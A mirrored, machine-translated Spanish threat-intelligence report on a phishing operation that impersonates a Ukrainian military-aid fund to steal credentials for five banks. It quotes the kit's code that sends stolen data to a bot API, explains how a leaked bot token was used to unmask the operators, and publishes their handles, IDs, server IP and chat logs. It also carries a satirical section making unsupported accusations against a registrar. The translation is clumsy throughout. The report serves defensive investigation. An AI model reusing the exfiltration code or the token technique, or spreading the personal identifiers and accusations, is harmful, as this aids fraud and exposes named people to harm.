Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / ES / DOPOMOGVOINA EXPOSED

Suplantación de identidad relacionada con la ayuda militar: cinco bancos de la UA afectados

The Enablers Registry·Editorial mirror·/es/dopomogvoina-exposed

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Se descubre una red de possibly phishing relacionada con la ayuda militar: Se han identificado cinco bancos como objetivos y se ha determinado quiénes son los responsables

El proceso automatizado de THE ENABLERS REGISTRY analizó en cuestión de minutos una operación de possibly phishing que se hacía pasar por una fundación de ayuda militar ucraniana, desde el registro del dominio hasta la identificación del operador.

25 de marzo de 2026 Investigación de THE ENABLERS REGISTRY 12 minutos de lectura
Captura de pantalla 1 — Resumen de la investigación: red de possibly phishing «[REDACTED][.]sbs» dirigida a veteranos militares ucranianos.
5
Bancos afectados
3
Operadores identificados
6
Llamadas a la API para desocultar
2
Proyectos paralelos de possibly phishing
<30
De unos minutos a un análisis completo
Declaración sobre patrocinadores(haz clic para ampliar)
Presentamos al patrocinador oficial de esta investigación
🏆 [REDACTED] 🏆
El más autoritario tomar nota de eso colabora con Netcraft (engañando a su sistema) · Proveedor oficial de dominios para el Mercado de drogas FinCEN MSB #31000023456789 · Proveedor de descuentos por volumen · Seguidor incondicional de la «El estafador típico» Comunidad de VK — pero aún no se ha apuntado a un curso sobre el anonimato
⭐ 1.8
Trustpilot
Valoración
$200
Precio en .ru
120₽ reales
0
Denuncias de abusos
ejecutado
15,000%
Dominio
marcado
  • A pesar de afirmar que es «chino» (de Hong Kong), el creador es de Gorlovka, República Popular de Donetsk. El logotipo chino es meramente decorativo, al igual que sus Condiciones de uso
  • Mantiene Asistencia en ruso a través de VKontakte y [REDACTED], vende .ru por 200 dólares, mientras que IANA #1606 cobra 120₽ (~$1.30)
  • Opiniones negativas en Trustpilot que mencionan dominios relacionados con el mercado de las drogas desaparecer misteriosamente. ¿Una coincidencia? Ni mucho menos.
  • Un suscriptor activo de «El estafador típico» (El estafador típico) Comunidad de VK: cuando tu registrador sigue a grupos de estafadores, ya sabes cuál es su público objetivo
  • Colabora con Netcraft lo justo para evitar la exclusión de la lista, al tiempo que se mantiene la infraestructura para los dominios relacionados con el possibly phishing, el juego y las drogas

Mientras tanto, en «Типичный Мошенник»:

Original (ruso)
Traducido (inglés)
Una promesa a nuestro patrocinador: Cuando esta publicación de «Типичный Мошенник» se haga realidad —y, por lo que sabemos, es cuestión de cuando, no si — Todo nuestro equipo se registrará en VKontakte y se unirá a la comunidad. Considéralo nuestra ovación de pie. 👏

* Esto es una sátira. IANA #3765 no ha patrocinado esta investigación. Sin embargo, la hicieron necesaria al negarse a actuar ante nuestras denuncias de abuso durante más de cinco días. Todo lo expuesto anteriormente se basa en información de dominio público y en nuestra experiencia operativa. Lee nuestro reportaje completo sobre IANA #3765

Lo que descubrió THE ENABLERS REGISTRY

El 20 de marzo de 2026, el proceso automatizado de detección de amenazas de THE ENABLERS REGISTRY detectó [REDACTED][.]sbs — un dominio recién registrado que aloja una página de possibly phishing que se hace pasar por «El escudo del defensor» («Escudo del Defensor»), una fundación ficticia dedicada a la ayuda militar a Ucrania. La página web se dirige a veteranos del ejército ucraniano, heridos en combate y familiares de soldados caídos, y les promete ayudas económicas del Gobierno mientras sustrae las credenciales bancarias de cinco de los bancos más importantes de Ucrania.

A continuación se ofrece un desglose completo de todo lo que ha revelado nuestro análisis automatizado: la ingeniería social, la infraestructura técnica, el sistema de control de operadores en tiempo real y las identidades de las personas que lo gestionan.

Evaluación de impacto
La página web se dirige específicamente a los más vulnerables: veteranos de guerra con trastorno de estrés postraumático (TEPT), familias de soldados fallecidos en combate que solicitan ayudas del Gobierno y personal militar herido que se enfrenta a complejos trámites burocráticos. Cada dato de acceso robado puede dar lugar a la apropiación total de la cuenta en cuestión de minutos.

Sección 1: El cebo — La falsa «Fundación de Ayuda Militar»

El dominio [REDACTED][.]sbs se registró el 20 de marzo de 2026 a través de [REDACTED], un registrador con un historial bien documentado de respuestas lentas o inexistentes ante los casos de abuso. El .sbs TLD (Side-By-Side) es un gTLD de bajo coste que se utiliza con frecuencia para crear infraestructuras de possibly phishing desechables.

La página web se presenta como un portal profesional de ayuda vinculado al Gobierno. La cabecera está ocupada por una bandera ucraniana, las imágenes militares le aportan autenticidad y el texto está redactado cuidadosamente en ucraniano con un lenguaje burocrático que se asemeja al de los programas gubernamentales legítimos.

Página de inicio del sitio web de phishing «[REDACTED]», que muestra una fundación de ayuda militar falsa
Captura de pantalla 5 — Página de inicio del sitio web de possibly phishing que se hace pasar por «Щит Захисника» (Escudo del Defensor).

Para ganarse la confianza de los usuarios, los operadores crearon un contador de estadísticas que aparecía en un lugar destacado de la página de inicio:

  • 2.847 solicitudes — lo que da a entender que miles de personas ya han recibido ayuda
  • Se han repartido ₴47,2 millones — una cifra elevada, pero creíble, en la UAH
  • 19 programas — lo que sugiere una operación integral que abarca varios programas

Estas cifras son totalmente inventadas y están codificadas directamente en el código fuente de la página, sin conexión alguna con el servidor. Tienen un único objetivo: servir de prueba social para disipar las dudas de la víctima.

Sección 2: La trampa — 5 bancos, un objetivo

Tras hacer clic en «Подати заявку» (Enviar solicitud), a la víctima se le muestra una pantalla para seleccionar un banco. Aparecen como opciones cinco de los bancos minoristas más grandes de Ucrania, cada uno con su marca y logotipo oficiales. Es aquí donde la ingeniería social pasa de la manipulación emocional al robo técnico.

Pantalla de selección de bancos en la que aparecen 5 bancos ucranianos
Captura de pantalla 6 — Pantalla de selección de banco. Cada opción da lugar a una secuencia personalizada de robo de credenciales.

El análisis del paquete de JavaScript del sitio web reveló que cada banco tiene un secuencia única de recopilación de credenciales en varias etapas, adaptado al flujo de autenticación real de ese banco:

PrivatBank

Iniciar sesiónContraseñaPINSMS

monobank

Iniciar sesiónPINSMSCorreo electrónico

Oschadbank

Iniciar sesiónVerificarSMS

PUMB

Iniciar sesiónSMS

Ukrsibbank

Iniciar sesiónPINSMS

El proceso del ataque es siempre el mismo en todos los bancos:

Página de ayuda falsa
Selección de bancos
Clon de inicio de sesión
Interceptación de la autenticación de dos factores
Apropiación indebida de una cuenta
Página de inicio de sesión falsa de PrivatBank
Captura de pantalla 7 — Página de inicio de sesión clonada de PrivatBank.
Página de inicio de sesión falsa de PUMB
Captura de pantalla 9 — Página de inicio de sesión de PUMB clonada.
Diagrama de flujo del ataque que muestra las etapas del phishing, desde la página falsa de ayuda hasta la apropiación de la cuenta
Captura de pantalla 10 — Flujo completo del ataque: desde la página falsa de ayuda militar, pasando por la selección del banco, hasta el robo de credenciales y la apropiación de la cuenta.

La pila tecnológica: SPA de React interfaz de usuario proporcionada a través de CDN de IANA #1910, con un Express.js backend que gestiona la sustracción de credenciales. La arquitectura de React permite crear formularios de varios pasos que se integran a la perfección y que resultan indistinguibles de las interfaces bancarias legítimas.

Sección 3: Control del operador en tiempo real

No se trata de un simple programa de recopilación de credenciales con una base de datos estática. El kit de possibly phishing incluye un Panel de control de WebSocket en tiempo real que permite a un operador humano controlar cada sesión de las víctimas en tiempo real.

El punto final de WebSocket en wss://[REDACTED][.]sbs/ws admite los siguientes tipos de mensajes:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

Este control en tiempo real permite al operador:

  • Forzar un estado de espera — mostrar el mensaje «Procesando tu solicitud...» mientras acceden a la cuenta bancaria real de la víctima
  • Redirigir a un paso concreto — volver a solicitar un código por SMS si el primero ha caducado
  • Mostrar mensajes de error falsos — «Código no válido, vuelva a introducirlo» para obtener varios tokens de autenticación de dos factores
  • Plantea preguntas personalizadas — solicitar la fecha de nacimiento, el número de tarjeta o cualquier otro dato adicional durante la sesión
¿Por qué es peligroso?
El control en tiempo real por parte del operador burla las protecciones de autenticación de dos factores (2FA) basadas en el tiempo. El operador intercepta el código SMS y lo utiliza dentro de su plazo de validez —normalmente entre 30 y 120 segundos—, mientras la víctima se queda mirando una animación falsa que indica que se está «procesando».
Formulario de introducción del número de teléfono en una página de inicio de sesión bancaria falsa
Captura de pantalla 8 — Formulario de introducción del número de teléfono utilizado para iniciar el robo de credenciales.
Panel de control del operador basado en WebSocket
Captura de pantalla 11 — Panel de control en tiempo real del operador para gestionar las sesiones de las víctimas.

La gama completa de datos sustraídos por sesión: phone, password, PIN, SMS code, card number, date of birth, y email.

Sección 4: Detrás de IANA #1910: dos proyectos, un servidor

El proxy de IANA #1910 oculta el servidor de origen, pero el proceso de análisis de la infraestructura de THE ENABLERS REGISTRY ha identificado la verdadera dirección IP de origen: 45.131.214[.]148, alojado en RapidSeedbox / LeaseWeb en los Países Bajos.

Un detalle fundamental: [REDACTED][.]sbs se transmite a través de IANA #1910, ocultando su dirección IP de origen. Pero nuestro sistema también rastrea hlpforvpeople[.]sbs — un dominio relacionado registrado a través del mismo registrador IANA #3765 con patrones coincidentes. Ese dominio es NO está detrás de IANA #1910, revelando directamente su dirección IP de origen: 45.131.214[.]148.

Conectarse directamente a esta IP — sin un Host encabezado — reveló algo inesperado: un una página web de possibly phishing totalmente diferente. En lugar de la ayuda militar a Ucrania, el vhost predeterminado servía «Identificación sanitaria», una operación de possibly phishing relacionada con un seguro médico indonesio. El mismo servidor, víctimas totalmente diferentes, un país totalmente diferente.

El mismo servidor, los mismos operadores, víctimas diferentes
  • Proyecto 1: Ayuda militar ucraniana → roba las credenciales bancarias de los veteranos
  • Proyecto 2: El seguro médico indonesio → roba los datos de acceso a la asistencia sanitaria de los ciudadanos
  • La misma pila de Express.js, el mismo panel de control en tiempo real con WebSocket
  • La misma interfaz de gestión del servidor BT-Panel (宝塔)
  • Dominio C2 del segundo proyecto: [REDACTED] — un panel de possibly phishing conocido identificado en la base de datos de amenazas de THE ENABLERS REGISTRY
  • Comentarios en ruso en el código fuente del proyecto indonesio lo confirman los mismos desarrolladores de CIS
Dos proyectos de phishing que se ejecutan en el mismo servidor: ayuda militar a Ucrania y seguro médico en Indonesia
Captura de pantalla 12 — Dos operaciones de possibly phishing paralelas que comparten el mismo servidor de origen: ayuda militar ucraniana ([REDACTED]) y seguro médico indonesio (HealthCare ID).

La plantilla de possibly phishing indonesia es una kit conocido registrado en la base de datos de inteligencia sobre amenazas de THE ENABLERS REGISTRY. Hemos observado variantes de esta misma plantilla en todo el sudeste asiático, dirigidas a entidades financieras de Indonesia, Tailandia y Vietnam. Los operadores se limitan a cambiar las plantillas específicas de cada país, al tiempo que reutilizan la misma infraestructura de fondo.

Delincuentes sin escrúpulos
Esta es la realidad de las operaciones modernas de possibly phishing: A los operadores no les importa a quién le roban. Veteranos ucranianos que buscan ayuda militar, trabajadores indonesios que contratan seguros médicos… El objetivo cambia en función de la plantilla que genere más ingresos. Los mismos operadores de habla rusa gestionan ambas campañas simultáneamente desde el mismo servidor, pasando de una víctima a otra en distintos países como si cambiaran de canal de televisión. Hoy son los bancos ucranianos. Mañana podrían ser los bancos israelíes —tal y como ya preguntó Bonya en marzo de 2026—.

Sección 5: El archivo config.json que lo reveló todo

A continuación te explicamos, paso a paso, cómo un único archivo mal configurado echó por tierra toda la operación.

Tras identificar el segundo proyecto del servidor de origen, el de THE ENABLERS REGISTRY, Analizador de JS —nuestra herramienta automatizada de análisis de JavaScript— se centró en el paquete del sitio web de possibly phishing indonesio en https://45.131.214[.]148/assets/index-ZMQxHb_h.js. El analizador extrajo todos los puntos finales de la API, las URL externas y las rutas de configuración del archivo JavaScript de 335 KB. Entre los resultados, cabe destacar:

  • Cinco puntos de conexión de la API en [REDACTED] — el panel C2 para la verificación de credenciales
  • Una conexión WebSocket a wss://rezervtemka[.]cc
  • Integración de Facebook Pixel para el seguimiento de víctimas
  • Una referencia a /config.json — se carga en tiempo de ejecución para la configuración del bot de [REDACTED]

Siguiendo esta pista, hemos obtenido /config.json desde la IP de origen. Se podía acceder al archivo sin necesidad de autenticación: estaba en el directorio raíz del servidor web y cualquiera podía leerlo:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.[REDACTED].org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

El /config.json Se podía acceder al archivo directamente desde la IP de origen — Sin autenticación, sin control de acceso, solo un archivo JSON sin más en el directorio raíz de la web:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

El token de un bot de [REDACTED] sirve tanto de nombre de usuario como de contraseña. Quien tenga el token puede realizar llamadas a la API en nombre de ese bot. Los operadores dejaron el suyo en un archivo de acceso público. Seis llamadas a la API más tarde, ya lo teníamos todo:

getMe — Identidad del bot: «MonettiCRM» (@MonettiCRM_bot)
getChat(chat_id) — Nombre del grupo: «Tarjeta Idr» con un enlace de invitación activo
getChatAdministrators — 3 administradores, incluido el creador del grupo
getChat(creator_id) — Creador: @monettiescobar, [REDACTED] Premium, perfil empresarial, zona horaria UTC+3
getChat(admin2_id) — Segundo administrador: perfil vacío, se sospecha que es una cuenta alternativa
getChatMemberCount — 5 miembros en total en el grupo de operadores
Cadena OSINT que muestra seis llamadas a la API de [REDACTED] desde el archivo config.json hasta la identificación completa del operador
Captura de pantalla 13 — La cadena completa de OSINT: desde el archivo config.json expuesto hasta la identificación completa del operador en 6 llamadas a la API.

Desde un único archivo mal configurado hasta la identificación completa de los operadores en seis solicitudes HTTP. Sin vulnerabilidades, sin acceso no autorizado: solo llamadas estándar a la API de [REDACTED] Bot utilizando un token que los propios operadores dejaron expuesto.

Sección 6: Los operadores

Una reflexión sobre la creatividad delictiva

Lo que viene a continuación es una auténtica lección magistral sobre cómo elegir nombres de alias horribles. Tenemos MONETTI ESCOBAR — porque nada transmite mejor la idea de «discreción» que ponerse el nombre del narcotraficante más famoso de la historia. Y luego está Bonya, también conocido como PapaZakonVor (literalmente «Papá-Ladrón-por-ley» —una referencia improvisada a la jerarquía criminal rusa—), Boa, y bubullikk. Y, por último, Devoys, cuyo nombre de usuario es @devosus Suena sospechosamente a «dev ops us»: un desarrollador que incluyó su cargo en su nombre de usuario. Son personas que pensaban que podían burlar la inteligencia automatizada contra amenazas. Spoiler: no pudieron.

El grupo de operadores de [REDACTED] «Idr card» queda al descubierto a través del token de un bot
Captura de pantalla 14 — El grupo de operadores de [REDACTED] «Idr card», al que se ha tenido acceso gracias a la filtración del token del bot.
Avatar de [REDACTED] de MONETTI ESCOBAR
Propietario / Creador
MONETTI ESCOBAR
@monettiescobar
ID de [REDACTED]: 8135223234
[REDACTED] Premium, perfil empresarial
Zona horaria: UTC+3 (región de la CEI)
10 mensajes públicos — OPSEC estricta
Chat de TraFFeeQMedusa Google AdsCanal de deepfakes
Avatar de Bonya en [REDACTED]
Operador / Tráfico
Bonya
@BoaCC159
ID de [REDACTED]: 6242202706
También conocido como: PapaZakonVor, Boa, bubullikk
261 mensajes repartidos en 12 grupos
DC2 — Ámsterdam, Países Bajos
CryptoGrabMercado STYXRaven CCCHAT DE EMPIRESolución Phoenix
Desarrollador / Programador
Devoys
@devosus
ID de [REDACTED]: 8213612730
Desarrollador de kits de possibly phishing — los operadores se refieren a él como «programador»
Se les pidió que «pensaran en la defensa» cuando se descubrió la brecha de seguridad
Diseño que minimiza el impacto en el espacio público
Asa @devosus ≈ «dev ops us» — el puesto de trabajo como nombre de usuario
Desarrollador de kitsInfraestructuraSeguridad

MONETTI ESCOBAR — El jefe

MONETTI mantiene una estricta seguridad operativa: solo 10 mensajes públicos divididos en dos grupos. Pero los grupos lo dicen todo: Chat de TraFFeeQ (arbitraje de tráfico con fines fraudulentos), Medusa Google Ads (prácticas de «black hat» en Google Ads), y un Canal de deepfakes. En su perfil empresarial de [REDACTED] figura «Есть предложение» («Tengo una propuesta») — que anuncian abiertamente sus servicios. La zona horaria UTC+3 (la misma que la de Moscú, Minsk y Kiev) y el horario de atención al público las 24 horas del día, los 7 días de la semana, confirman que se trata de una empresa con sede en la CEI que opera sin descanso.

Bonya — El descuidado

A diferencia de la rigurosa seguridad operativa (OPSEC) de MONETTI, Bonya (antiguo alias: PapaZakonVor — algo así como «DaddyThiefByLaw») dejó un rastro digital enorme — 261 mensajes repartidos entre 12 grupos clandestinos. Su historial de chat parece un currículum de delincuente:

Las propias palabras de Bonya (traducidas del ruso)
  • «fichas para una corriente de 2,0»«Solo possibly phishing para [seguridad bancaria] 2.0» — analizar la compatibilidad de los kits de possibly phishing con los sistemas de seguridad bancarios más recientes
  • «Es difícil encontrar buenos drops»«Es difícil encontrar buenos «mulas» para el blanqueo de dinero» — buscar cómplices para la retirada de fondos
  • «Vamos al centro cultural a trabajar conmigo»«Ven a trabajar a mi centro de atención telefónica» — contratación de operadores
  • «¿Hay por aquí alguien que haya trabajado con bancos de Israel?»«¿Hay alguien aquí que haya trabajado con bancos israelíes?» — ampliación a nuevos objetivos (marzo de 2026)
  • «La verdad es que no veo muchos logotipos de la Finka».«No veo muchos registros financieros» — sobre la calidad de las credenciales robadas
  • «Si 1 proxy consume entre 1 y 2 bancos de corriente»«Un representante para solo 1 o 2 bancos» — debate sobre la seguridad operativa en materia de fraude bancario
  • «El cajero automático le retuvo la tarjeta»«El cajero automático se quedó con su tarjeta». — Un «mulo» les robó ₴60 000, alegando que el cajero automático se había quedado con la tarjeta. Incluso los delincuentes son víctimas de estafas por parte de sus propios cómplices.

Su pertenencia a diversos grupos ofrece una visión completa: CryptoGrab (los que vacían carteras de criptomonedas), Mercado STYX (mercado negro de datos robados), Verificador de CC de Raven (herramientas de validación de tarjetas de crédito), CHAT DE EMPIRE y Solución Phoenix (coordinación de fraudes). No se trata de un delincuente que ha cometido un delito aislado, sino de alguien integrado en el ecosistema de la ciberdelincuencia.

Devoys — El desarrollador

La columna vertebral técnica de la operación. Diseñada para tener una presencia pública mínima; cuando el grupo fue infiltrado, Bonya lo llamó expresamente: «@devosus, piensa en la defensa antes de que nos den una paliza».«@devosus, pensemos en la defensa antes de que nos den una paliza». Su respuesta sarcástica ante la filtración — «¿Cuándo en Interpol?» («cuándo interpolar») — lo que sugiere que no es la primera vez que se han librado por los pelos.

Análisis del comportamiento: 261 mensajes descifrados

El proceso de OSINT de THE ENABLERS REGISTRY recopiló y tradujo los 261 mensajes públicos procedentes de Bonya a través de 12 grupos clandestinos de [REDACTED] (junio de 2024 — marzo de 2026). Traducción automática mediante la API de DeepL con corrección manual del contexto. Los mensajes revelan un perfil operativo completo, clasificado a continuación por tipo de actividad delictiva.

Distribución de mensajes: 261 mensajes repartidos en 12 grupos
  • 💬ONE|Chat — 91 mensajes (coordinación contra el fraude)
  • Actualidad/Verificaciones — 37 mensajes (estafas de verificación)
  • Rolex | chat general — 28 mensajes (carding)
  • CHAT DE EMPIRE — 24 mensajes (mercado negro)
  • Fbstore — 23 mensajes (arbitraje de tráfico)
  • FB-DOC — 22 mensajes (fraude publicitario)
  • Solución Phoenix — 17 mensajes (fraude bancario)
  • CryptoGrab — 11 mensajes (drenaje de criptomonedas)
  • Mercado STYX — 2 mensajes (mercado clandestino)
  • Verificador de CC de Raven — 2 mensajes (comprobación de tarjetas)

Fraude bancario y possibly phishing

💬ONE|ChatMarzo de 2025
«Aquí solo hay 2,0 phish»
Y aquí los fusibles para una intensidad de 2,0
Análisis de la compatibilidad de los kits de possibly phishing con los nuevos protocolos de seguridad de los bancos
💬ONE|ChatMarzo de 2025
«Tío, aquí no venden nada a través de possibly phishing, es possibly phishing para obtener dinero».
Tío, aquí no venden nada con fichas; aquí las fichas son para pagar.
Distinción entre el «possibly phishing con fines de venta» y el «possibly phishing con fines de robo directo»
Solución PhoenixMarzo de 2026
«¿Hay alguien aquí que haya trabajado con bancos en Israel?»
¿Hay por aquí alguien que haya trabajado con bancos de Israel?
Ampliación de las operaciones al sector bancario israelí — 5 días antes de nuestra investigación
Rolex | chat generalSeptiembre de 2024
«Si hay un solo representante, solo uno o dos bancos»
Si hay 1 proxy, 1-2 bancos de corriente
Seguridad operativa frente al fraude multibancario: un proxy por cada 1-2 bancos para evitar ser detectado
Rolex | chat generalSeptiembre de 2024
«No veo muchos registros financieros»
La verdad es que no veo muchos logotipos de la Finka
Quejas sobre la calidad de las credenciales bancarias robadas en los mercados clandestinos

«Mulas de dinero» y «retirada de efectivo»

💬ONE|ChatMarzo de 2025
«Es difícil encontrar buenas ofertas»
También es difícil encontrar buenos drops
«Drops» = personas que se encargan de retirar fondos robados. Se quejan de la dificultad para reclutar gente.
💬ONE|ChatMarzo de 2025
«Ven a trabajar a mi centro de atención telefónica»
Ven al centro cultural a trabajar conmigo
Reclutamiento activo de personas para trabajar en un centro de llamadas dedicado al fraude
ActualidadJunio de 2024
«Nos han robado 60 mil»
Nos han robado 60 mil
Un «mulo» les robó ₴60 000 a los propios estafadores. Una justicia irónica.
ActualidadJunio de 2024
«¿Cómo coño se le ha podido tragar la tarjeta al cajero automático?»
¿Cómo coño se le ha podido tragar la tarjeta al cajero automático?
El cómplice afirmó que el cajero automático «se había quedado» con la tarjeta para quedarse con el dinero robado. Estafadores que estafan a otros estafadores.
ActualidadJunio de 2024
«Nos lo transfirió, pero luego no teníamos la cuenta principal para transferir el dinero».
Ella nos pasó el problema a nosotros, pero nosotros no teníamos el medio de pago principal para transferir el dinero
Descripción de la cadena de retirada de efectivo: víctima → cuenta intermediaria → «mula» principal

Fraude de tráfico y uso indebido de la publicidad

CHAT DE EMPIREMarzo de 2026
«No uso Google, solo Facebook»
Bueno, yo no uso Google, solo Facebook.
Se especializa en el fraude publicitario en Facebook: redirige el tráfico hacia páginas de possibly phishing
FB-DOCFebrero de 2026
«Yo tampoco destinaría un % del presupuesto publicitario sin un avalista».
Yo tampoco invertiría en función de un porcentaje del gasto sin una garantía.
Negociación de las condiciones de pago para la realización de campañas publicitarias fraudulentas en Facebook
CryptoGrabEnero de 2025
«Probé el AML en Facebook para dirigirme al mercado estadounidense, pero no encontré ninguna configuración adecuada en Internet».
He intentado buscar «AML» en Facebook para ver si encontraba algo sobre Estados Unidos, pero tampoco he encontrado nada interesante, ni siquiera enlaces antiguos, en Internet.
Intento de utilizar los anuncios de Facebook para llevar a cabo estafas relacionadas con la lucha contra el blanqueo de capitales dirigidas a víctimas estadounidenses
Perfil psicológico: Bonya

El corpus de 261 mensajes revela un ciberdelincuente de nivel medio con actividades diversificadas: possibly phishing bancario, redes de «mulas» de dinero, fraude en anuncios de Facebook, robo de criptomonedas y comprobación de tarjetas de crédito. Características principales:

  • Descuido operativo — 261 mensajes en grupos públicos desde una sola cuenta. El uso de varios alias (PapaZakonVor → Boa → Bonya) sugiere que era consciente de la importancia de la seguridad operativa (OPSEC), pero que no la puso en práctica.
  • Mentalidad de selección de personal — invita activamente a la gente a «trabajar en mi centro de atención telefónica» y vende conocimientos operativos a cambio de dinero en efectivo
  • Indiferencia hacia las víctimas — analiza los objetivos ucranianos, europeos, israelíes y estadounidenses con el mismo distanciamiento. La geografía no es más que una variable en la ecuación del fraude
  • Problemas de confianza — fue traicionado por su propio «mulo» por 60 000 ₴. Irónicamente, esto refleja la desconfianza que él mismo genera en sus víctimas.
  • Impulsado por la expansión — aún en marzo de 2026, buscando activamente nuevos mercados bancarios (Israel), lo que sugiere que el ataque de possibly phishing en Ucrania es solo una de las muchas operaciones que se están llevando a cabo simultáneamente
Bonya: Registro completo de mensajes (253 mensajes repartidos en 12 grupos)
Bonya (@BoaCC159) — Historial completo de mensajes traducidos
-- Phoenix Solution (16 mensajes) --
B
Bonya2026-03-17 14:22
¿Hay alguien aquí que haya trabajado con bancos en Israel?¿Hay por aquí alguien que haya trabajado con bancos de Israel?
B
Bonya2026-03-17 14:22
y además trabajando en silencio.Nosotros también trabajamos en silencio
B
Bonya2026-03-17 14:17
¿Qué tal?¿Qué tal?
B
Bonya2026-03-17 14:17
Hola a todosHola a todos
B
Bonya2026-03-15 19:02
Bueno, pues ya está prácticamente todo arreglado.Bueno, en general ya lo han solucionado todo
B
Bonya2026-03-15 19:02
Bueno, es un poco complicadoBueno, pues hemos montado un poco de lío
B
Bonya2026-03-15 19:01
Sí, yo también he estado trabajando mucho en silencio, qué lío.Sí, la verdad es que ya estoy harto de tanto trabajar en silencio.
B
Bonya2026-03-15 19:00
¿Qué tal te ha ido el día libre?¿Cómo fue el fin de semana?
B
Bonya2026-03-15 19:00
Todos vosotros.Para todos
B
Bonya2026-03-14 14:29
Ya no es tan anónimo, ahora que todo el mundo sabe que es Marik.Ya no es tan anónimo, porque todo el mundo sabe quién es ese marik.
B
Bonya2026-03-14 14:24
RenacidoRenacido
B
Bonya2026-03-14 14:24
JajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajajJajajajajajajaja
B
Bonya2026-03-14 14:23
Me entristeció ver que la sala de chat ya no estaba.Me quedé muy triste cuando vi que el chat había desaparecido
B
Bonya2026-03-14 14:22
Pensaba que nunca te encontraría.Ya pensaba que no iba a dar con vosotros
B
Bonya2026-03-14 14:22
KooКу
B
Bonya2026-03-14 14:22
JoderJoder
-- 👨‍⚕️ FB-DOC — Chat sobre arbitraje de tráfico (21 mensajes) --
B
Bonya2026-03-15 07:23
@fbdoc21@fbdoc21
B
Bonya2026-03-15 07:20
Date un golpe en la frente con la polla.Me voy a dar un golpe en la frente con la polla
B
Bonya2026-03-06 15:18
Como un cinco en la pantalla de 2,5😂.Como se ve en la captura de pantalla, un 2,5 😂
B
Bonya2026-02-19 17:05
A todos vosotros.A todos vosotros
B
Bonya2026-02-19 17:04
Si cierras un trato, me echaré a reír.Si abres una operación, me voy a partir de risa
B
Bonya2026-02-19 17:04
¿continental?¿continental?
B
Bonya2026-02-19 17:04
Pues ahí la tienes.Pues ahí la tienes, está de acuerdo
B
Bonya2026-02-19 17:01
Por eso, comprueba siempre los antecedentes cuando pidas un avalista.Así que comprueba siempre esto cuando preguntes por el garante.
B
Bonya2026-02-19 17:00
Preguntó por un avalista y desapareció al instante.Preguntó por el garante y desapareció enseguida
B
Bonya2026-02-19 17:00
Ay, Carinahola, Karina
B
Bonya2026-02-19 16:59
¿Así que vas a buscar un avalista?¿Te vas a arriesgar?
B
Bonya2026-02-19 16:57
Yo tampoco concedería un porcentaje del gasto sin un avalista.Yo tampoco invertiría en función de un porcentaje del gasto sin una garantía.
B
Bonya2026-02-19 16:57
¿yo?¿yo?
B
Bonya2026-02-19 16:57
Bueno, ella me mandó unas capturas de pantalla y tú no me has dado nada.Bueno, ella ha subido unas capturas de pantalla y tú no has aportado nada.
B
Bonya2026-02-19 16:56
mira las capturas de pantalla que ha publicadoEcha un vistazo a las capturas de pantalla que ha enviado.
B
Bonya2026-02-19 16:55
¿No mencionó nada sobre un avalista?¿No ha escrito nada sobre el garante?
B
Bonya2026-02-19 16:54
Eres un bicho raro😂¿Pero qué friki eres? 😂
B
Bonya2026-02-19 16:53
Me pediste un avalista.¿Le has pedido al garante?
B
Bonya2026-02-19 16:52
donde¿En qué lugar?
B
Bonya2026-02-17 14:37
¿Quién va a conseguir unos buenos coches para la tienda?¿Quién me va a recomendar una tienda con buenos coches?
B
Bonya2026-02-17 12:10
Donde quieras, te lo harán😂En cualquier sitio donde les apetezca, te lo harán😂
-- CHAT DE EMPIRE (24 mensajes) --
B
Bonya2026-03-14 13:17
Ya he descubierto cómo hacerlo, pero me da pereza explicarlo.Ya lo he entendido, pero me da pereza explicarlo
B
Bonya2026-03-14 13:17
Te va a dar una paliza, pase lo que pase.Te va a joder, pase lo que pase.
B
Bonya2026-03-12 17:16
De diferentes maneras.De diferentes maneras
B
Bonya2026-03-12 17:08
+ Además, ahora mismo hay muchas tormentas.+ Ahora mismo hay fuertes tormentas
B
Bonya2026-03-12 17:07
Si es negro, apuesto a que...Si fuera negro, habría apostado
B
Bonya2026-03-12 17:07
Depende del tipo de oferta; si es «blanca», sí.Depende de la oferta; si es la blanca, entonces sí.
B
Bonya2026-03-12 17:06
Son dos mundos diferentesDos mundos diferentes, eso es
B
Bonya2026-03-12 17:06
No hay ningún otroNo hay ninguna otra
B
Bonya2026-03-12 17:06
Puedes configurarlo para que solo los ordenadoresAllí se puede configurar para que solo aparezcan los ordenadores.
B
Bonya2026-03-12 17:05
Google no es tan eficaz como yo creo.Google no es tan eficaz como yo creo
B
Bonya2026-03-12 17:05
Bueno, yo no uso Google, solo Facebook.Bueno, yo no uso Google, solo Facebook.
B
Bonya2026-03-12 17:05
Siempre y cuando tengas que encontrar una ligadura en algún momento de todo el proceso.Siempre y cuando aún haya que meter a todos estos inútiles en el mismo saco
B
Bonya2026-03-12 17:04
Rechazos, ackeys que salen disparados como tormentas. Etcétera.Rechazos, las cuentas se van volando así como así, como si fueran tormentas. Etcétera.
B
Bonya2026-03-12 17:04
No todo es de color de rosa, tío.No, eso no es todo, tío, son solo florecitas
B
Bonya2026-03-12 17:03
Todas las adquisiciones regulares de Air con mayor confianzaTodas las baterías normales de aire con la mejor confianza
B
Bonya2026-03-12 17:03
En estos momentos no hay ninguna agencia buena en el mercado.Ahora mismo no hay buenas agencias en el mercado.
B
Bonya2026-03-12 17:02
Más angustiante que aterradorMás bien es una cuestión de nervios que de miedo
B
Bonya2026-03-12 17:02
Las criptomonedas, la pasión por el juego y la negritud se desbordanCriptomonedas, juegos de azar y música oscura: todo fluye
B
Bonya2026-03-12 17:01
